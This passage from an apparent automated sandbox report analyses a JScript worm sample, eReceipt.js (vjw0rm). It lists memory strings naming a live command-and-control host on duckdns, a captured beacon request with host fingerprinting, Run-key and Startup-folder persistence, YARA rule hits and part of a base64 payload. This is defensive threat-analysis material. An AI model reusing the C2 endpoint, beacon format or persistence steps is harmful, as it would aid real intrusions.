      Source: wscript.exe, 00000000.00000003.354426581.000001C6DCBAD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.354234861.000001C6DCBAC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.881556438.000001C6DCBAF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.458352994.00000244AF37E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.881936001.00000244AF37E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zeegod.duckdns.org:9003/Ag
      Source: wscript.exe, 00000010.00000002.884362520.00000244B00A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zeegod.duckdns.org:9003/Vre
      Source: wscript.exe, 00000005.00000003.815093819.000001B3A057A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.883135127.000001B3A057D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zeegod.duckdns.org:9003/Vre#
      Source: wscript.exe, 00000005.00000002.884039179.000001B3A0690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zeegod.duckdns.org:9003/Vre-z
      Source: wscript.exe, 00000000.00000002.882808280.000001C6DD8AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zeegod.duckdns.org:9003/Vre0
      Source: wscript.exe, 00000010.00000002.882947687.00000244AF47E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zeegod.duckdns.org:9003/Vre0&
      Source: wscript.exe, 00000000.00000002.881792524.000001C6DCC84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zeegod.duckdns.org:9003/Vre2
      Source: wscript.exe, 00000010.00000002.884362520.00000244B00A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zeegod.duckdns.org:9003/Vre5
      Source: wscript.exe, 00000000.00000002.882808280.000001C6DD8AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zeegod.duckdns.org:9003/Vre5(
      Source: wscript.exe, 00000005.00000002.884584250.000001B3A1169000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zeegod.duckdns.org:9003/Vre5BP
      Source: wscript.exe, 00000009.00000002.883203781.0000011D6E515000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zeegod.duckdns.org:9003/Vre798AD7C45B15A
      Source: wscript.exe, 00000005.00000002.884283434.000001B3A0DF0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.882515571.0000011D6E1A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.883937570.00000244AFD70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zeegod.duckdns.org:9003/Vre7DQpmb3Ig
      Source: wscript.exe, 00000009.00000002.881854049.0000011D6D8E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zeegod.duckdns.org:9003/Vre?Lw
      Source: wscript.exe, 00000000.00000002.881792524.000001C6DCC84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zeegod.duckdns.org:9003/VreB
      Source: wscript.exe, 00000005.00000002.884283434.000001B3A0DF0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.882515571.0000011D6E1A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zeegod.duckdns.org:9003/VreICAgICAgICAgICAgIC
      Source: wscript.exe, 00000009.00000002.882763356.0000011D6E4A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zeegod.duckdns.org:9003/VreJ
      Source: wscript.exe, 00000005.00000002.883505845.000001B3A05C9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.881803714.0000011D6D8B2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.883452838.00000244AF4E2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.879910035.00000244AD532000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zeegod.duckdns.org:9003/VreM
      Source: wscript.exe, 00000000.00000002.881792524.000001C6DCC84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.815093819.000001B3A057A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.883135127.000001B3A057D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zeegod.duckdns.org:9003/VreMcroWinows
      Source: wscript.exe, 00000010.00000002.882947687.00000244AF47E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zeegod.duckdns.org:9003/VreMcroWinows1
      Source: wscript.exe, 00000009.00000002.881803714.0000011D6D8B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zeegod.duckdns.org:9003/VreMcroWinowsC
      Source: wscript.exe, 00000005.00000002.884584250.000001B3A1169000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zeegod.duckdns.org:9003/VreT
      Source: wscript.exe, 00000005.00000003.815093819.000001B3A057A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.883135127.000001B3A057D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zeegod.duckdns.org:9003/VreW&&1
      Source: wscript.exe, 00000010.00000002.884362520.00000244B00A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zeegod.duckdns.org:9003/Vreba&
      Source: wscript.exe, 00000000.00000002.881896029.000001C6DCCF0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.884283434.000001B3A0DF0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.882515571.0000011D6E1A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.883937570.00000244AFD70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zeegod.duckdns.org:9003/VrebiBuZXcgQWN0aXZlWE
      Source: wscript.exe, 00000000.00000002.882571223.000001C6DD870000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zeegod.duckdns.org:9003/VreenP
      Source: wscript.exe, 00000000.00000002.881792524.000001C6DCC84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zeegod.duckdns.org:9003/Vrem
      Source: wscript.exe, 00000005.00000003.814806136.000001B3A1155000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.814853193.000001B3A1161000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.814903129.000001B3A1167000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zeegod.duckdns.org:9003/Vreo
      Source: wscript.exe, 00000000.00000002.882571223.000001C6DD870000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zeegod.duckdns.org:9003/Vres
      Source: wscript.exe, 00000005.00000002.884283434.000001B3A0DF0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.882515571.0000011D6E1A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.883937570.00000244AFD70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zeegod.duckdns.org:9003/Vreuc3BsaXQo
      Source: wscript.exe, 00000009.00000002.882911583.0000011D6E4C8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.884292781.00000244B0070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
      Source: unknown HTTP traffic detected:
      POST /Vre HTTP/1.1
      Accept: */*
      User-Agent: vjw0rm_0453C53E\computer\user\Microsoft Windows 10 Pro\Windows Defender\\YES\FALSE\
      Accept-Language: en-us
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      Host: zeegod.duckdns.org:9003
      Content-Length: 0
      Connection: Keep-Alive
      Cache-Control: no-cache
      Source: unknown DNS traffic detected: queries for: zeegod.duckdns.org

      System Summary

      Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\XZqsVjnTsr.js
      Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\XZqsVjnTsr.js
      Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\XZqsVjnTsr.js
      Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\XZqsVjnTsr.js
      Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\XZqsVjnTsr.js
      Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\XZqsVjnTsr.js
      Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\XZqsVjnTsr.js
      Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\XZqsVjnTsr.js
      Source: eReceipt.js | Initial sample: Suspicious string win32_ D2LUMZJF
      Source: 00000009.00000002.880440429.0000011D6BAC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
      Source: 00000010.00000002.882089368.00000244AF3F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
      Source: 00000000.00000002.881750287.000001C6DCC58000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
      Source: 00000005.00000002.882946701.000001B3A0557000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
      Source: 00000012.00000002.879936544.0000026BB17B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: webshell_asp_generic date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, modified = 2021-10-29
      Source: 00000009.00000002.882515571.0000011D6E1A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
      Source: 00000005.00000002.884283434.000001B3A0DF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
      Source: 00000010.00000002.880524674.00000244AD5E3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
      Source: 00000005.00000003.815386378.000001B39E7A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
      Source: 00000009.00000002.880465658.0000011D6BAE4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
      Source: 00000005.00000002.881460459.000001B39E783000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
      Source: 00000010.00000002.883937570.00000244AFD70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
      Source: 0000000C.00000002.880832784.00000171E0417000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: webshell_asp_generic date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, modified = 2021-10-29
      Source: 00000010.00000002.880727385.00000244AD604000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
      Source: 00000000.00000002.881896029.000001C6DCCF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
      Source: 00000009.00000002.881676533.0000011D6D82C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
      Source: 00000000.00000002.881056008.000001C6DADBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
      Source: 00000005.00000003.390360933.000001B3A054F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
      Source: 00000007.00000002.881255255.00000280C91ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: webshell_asp_generic date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, modified = 2021-10-29
      Source: 00000001.00000002.881083256.000001FE4248F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: webshell_asp_generic date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, modified = 2021-10-29
      Source: 00000005.00000002.881618761.000001B39E7A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
      Source: 00000000.00000003.353378984.000001C6DCC2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
      Source: 00000005.00000003.815331689.000001B3A0557000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
      Source: 00000010.00000003.457112240.00000244AF413000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
      Source: 00000000.00000002.880778085.000001C6DAD96000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
      Source: Process Memory Space: wscript.exe PID: 3908, type: MEMORYSTR | Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
      Source: Process Memory Space: wscript.exe PID: 6860, type: MEMORYSTR | Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
      Source: Process Memory Space: wscript.exe PID: 5768, type: MEMORYSTR | Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
      Source: Process Memory Space: wscript.exe PID: 792, type: MEMORYSTR | Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
      Source: eReceipt.js | Initial sample: Strings found which are bigger than 50
      Source: eReceipt.js | ReversingLabs: Detection: 19%
      Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\eReceipt.js"
      Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\XZqsVjnTsr.js
      Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\eReceipt.js"
      Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\XZqsVjnTsr.js
      Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\XZqsVjnTsr.js"
      Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\eReceipt.js"
      Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\XZqsVjnTsr.js
      Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\XZqsVjnTsr.js"
      Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\eReceipt.js"
      Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\XZqsVjnTsr.js
      Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XZqsVjnTsr.js"
      Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\XZqsVjnTsr.js
      Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\XZqsVjnTsr.js
      Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\XZqsVjnTsr.js
      Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\XZqsVjnTsr.js
      Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
      Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Roaming\XZqsVjnTsr.js
      Source: classification engine | Classification label: mal100.troj.expl.evad.winJS@15/6@4/2
      Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
      Source: C:\Windows\System32\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\System32\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\System32\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\System32\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\System32\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\System32\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\System32\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\System32\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts
      Source: eReceipt.js | String: entropy: 5.55, length: 43961, content: 'dHJ5ewp2YXIgbG9uZ1RleHQxID0gIkt5Z2hRWEp5WVhrdWNISnZkRzkwZVhCbExtWnZja1ZoWTJnZ1B5QkJjbkpoZVM1d2NtOTB

      Boot Survival

      Source: C:\Windows\System32\wscript.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 00FAYTSXGU
      Source: C:\Windows\System32\wscript.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 1NBCD3W1VR
      Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\eReceipt.js
      Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XZqsVjnTsr.js
      Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\eReceipt.js
      Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\eReceipt.js
      Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\eReceipt.js\:Zone.Identifier:$DATA
      Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XZqsVjnTsr.js
      Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\eReceipt.js\:Zone.Identifier:$DATA
      Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\eReceipt.js\:Zone.Identifier:$DATA
      Source: C:\Windows\System32\wscript.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 1NBCD3W1VR
      Source: C:\Windows\System32\wscript.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 1NBCD3W1VR
      Source: C:\Windows\System32\wscript.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 00FAYTSXGU
      Source: C:\Windows\System32\wscript.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 00FAYTSXGU

      Hooking and other Techniques for Hiding and Protection

      Source: unknown | Network traffic detected: HTTP traffic on port 49762 -> 9003
      Source: unknown | Network traffic detected: HTTP traffic on port 9003 -> 49762
      Source: unknown | Network traffic detected: HTTP traffic on port 49772 -> 9003
      Source: unknown | Network traffic detected: HTTP traffic on port 49762 -> 9003
      Source: unknown | Network traffic detected: HTTP traffic on port 49781 -> 9003
      Source: unknown | Network traffic detected: HTTP traffic on port 9003 -> 49772
      Source: unknown | Network traffic detected: HTTP traffic on port 9003 -> 49762
      Source: unknown | Network traffic detected: HTTP traffic on port 49772 -> 9003
      Source: unknown | Network traffic detected: HTTP traffic on port 49762 -> 9003
      Source: unknown | Network traffic detected: HTTP traffic on port 49788 -> 9003
      Source: unknown | Network traffic detected: HTTP traffic on port 9003 -> 49781
      Source: unknown | Network traffic detected: HTTP traffic on port 9003 -> 49772
      Source: unknown | Network traffic detected: HTTP traffic on port 49781 -> 9003
      Source: unknown | Network traffic detected: HTTP traffic on port 49772 -> 9003
      Source: unknown | Network traffic detected: HTTP traffic on port 9003 -> 49788
      Source: unknown | Network traffic detected: HTTP traffic on port 49788 -> 9003
      Source: unknown | Network traffic detected: HTTP traffic on port 9003 -> 49781
      Source: unknown | Network traffic detected: HTTP traffic on port 9003 -> 49772
      Source: unknown | Network traffic detected: HTTP traffic on port 49781 -> 9003
      Source: unknown | Network traffic detected: HTTP traffic on port 49772 -> 9003
      Source: unknown | Network traffic detected: HTTP traffic on port 9003 -> 49788
      Source: unknown | Network traffic detected: HTTP traffic on port 49788 -> 9003
      Source: unknown | Network traffic detected: HTTP traffic on port 9003 -> 49781
      Source: unknown | Network traffic detected: HTTP traffic on port 9003 -> 49772
      Source: unknown | Network traffic detected: HTTP traffic on port 49781 -> 9003
      Source: unknown | Network traffic detected: HTTP traffic on port 49772 -> 9003
      Source: unknown | Network traffic detected: HTTP traffic on port 9003 -> 49788
      Source: unknown | Network traffic detected: HTTP traffic on port 49788 -> 9003
      Source: unknown | Network traffic detected: HTTP traffic on port 9003 -> 49781
      Source: unknown | Network traffic detected: HTTP traffic on port 9003 -> 49772
      Source: unknown | Network traffic detected: HTTP traffic on port 49781 -> 9003
      Source: unknown | Network traffic detected: HTTP traffic on port 49772 -> 9003
      Source: unknown | Network traffic detected: HTTP traffic on port 9003 -> 49788
      Source: unknown | Network traffic detected: HTTP traffic on port 49788 -> 9003
      Source: unknown | Network traffic detected: HTTP traffic on port 9003 -> 49781
      Source: unknown | Network traffic detected: HTTP traffic on port 9003 -> 49772
      Source: unknown | Network traffic detected: HTTP traffic on port 49781 -> 9003
      Source: unknown | Network traffic detected: HTTP traffic on port 49772 -> 9003
      Source: unknown | Network traffic detected: HTTP traffic on port 9003 -> 49788
      Source: unknown | Network traffic detected: HTTP traffic on port 49788 -> 9003
      Source: unknown | Network traffic detected: HTTP traffic on port 9003 -> 49781
      Source: unknown | Network traffic detected: HTTP traffic on port 9003 -> 49772
      Source: C:\Windows\System32\wscript.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
      Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
